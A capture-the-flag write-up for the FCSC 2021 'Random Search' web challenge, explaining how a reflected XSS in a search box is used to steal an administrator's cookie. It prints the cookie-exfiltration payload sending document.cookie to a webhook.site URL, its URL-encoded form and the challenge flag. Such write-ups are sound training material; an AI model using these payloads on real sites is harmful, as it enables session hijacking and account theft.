FCSC 2021 - Intro - Random Search

May 03, 2021   
web writeup 
Also available in:  🇫🇷 


Challenge

Can you steal the cookie of the administrator who visits the pages?

http://challenges2.france-cybersecurity-challenge.fr:5001/


Solving the challenge

While exploring a little the functionalities of the site, we notice a contact page allowing to report a vulnerability to the administrators of the site.

This is very interesting because it can allow us a Cross Site Scripting (XSS) attack to retrieve cookies from the administrator.

First, we need to find an entry vulnerable to a Cross Site Scripting (XSS) attack. Bingo, the search box does not filter user data and allows XSS. If we enter this payload in the search bar:

<script>alert(1)</script>

We get an XSS:

We are therefore going to create a payload to exfiltrate the cookies of the browser that visits the page. To do so, I used the site webhook.site allowing to receive HTTP requests and therefore very useful for exfiltrating cookies. To force the browser to change page, just change the value of the window.location variable in JavaScript like this:

<script>
window.location="https://webhook.site/ca1e06eb-8390-41d5-8f8b-0dff4baafcda/?c="+document.cookie
</script>

Then, we have to URLencode this payload, and to place it in the search parameter passed in GET request written in the URL:

http://challenges2.france-cybersecurity-challenge.fr:5001/index.php?search=%3Cimg+src%3Dx+onerror%3D%27window.location%3D%22https%3A%2F%2Fwebhook.site%2Fca1e06eb-8390-41d5-8f8b-0dff4baafcda%2F%3Fc%3D%22%2Bdocument.cookie%27%3E

Then we send this URL to the administrator via the contact form to report a vulnerability, and we just have to wait for the administrator to access our link.

A few minutes later, we see a request appear in the webhook.site:

And we see the flag in the exfiltrated cookies:

FCSC{4e0451cc88a9a96e7e46947461382008d8c8f4304373b8907964675c27d7c633}